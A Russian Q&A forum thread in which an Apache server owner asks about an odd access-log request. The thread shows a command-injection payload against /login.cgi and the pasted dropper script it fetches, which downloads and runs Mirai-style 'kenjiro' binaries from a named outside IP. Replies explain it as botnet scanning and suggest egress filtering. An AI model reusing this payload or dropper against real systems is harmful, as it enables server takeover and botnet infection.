Задать вопрос
MegaCraZy6
@MegaCraZy6
Юзерь

Что за странные запросы на веб сайт?

Стоит apache веб сервер. Решил посмотреть с интереса логи в а именно /var/log/apache2/access.log

Там какой-то запрос непонятный:
"GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.171/bin%20-0%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"


Я решил по приколу взять тот ИП что в запросе и в браузере вбить
http://176.32.33.171/bin

Скачался файл с содержимым:
n="kenjiro.arm kenjiro.arm7 kenjiro.mips kenjiro.mpsl"
http_server="176.32.33.171"
dirs="/tmp/ /dev/ /dev/shm/ /var/ /var/run/ /var/tmp/"

for dir in $dirs
do
 >$dir.file && cd $dir
done

for i in $n
do
 cp $SHELL $i
 >$i
 chmod 777 $i
 wget http://$http_server/$i -O- >$i || curl -O http://$http_server/$
 chmod 777 $i
 ./$i
done


Причем перед тем уже было что-то такое, там содержимое если не индентично то ну очень похоже уже не вспомню. А название файла было другое.
  • Вопрос задан
  • 2190 просмотров
Подписаться 1 Простой Комментировать
Решения вопроса 3
Stalker_RED
@Stalker_RED
Китайские боты вас нашли и пытаются вам залить шеллкод или вирус.
БЕГN!

Заранее отвечаю на вопрос "а как они меня нашли?":
На сканирование ВСЕХ АДРЕСОВ ipv4 по одному порту (80 же?) нужно около 25 минут. Они не лично вас искали, а вообще любые веб-сервера. И всем пытаются впарить вирус. И этим занимаются не только китайцы.
Ответ написан
vaut
@vaut
Попытка использовать уязвимость CMS и загрузить свой код на ваш сервер.
Ответ написан
ttys
@ttys
DevOps Jedi
iptables настраиваем грамотно с дропом исходящего трафика
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы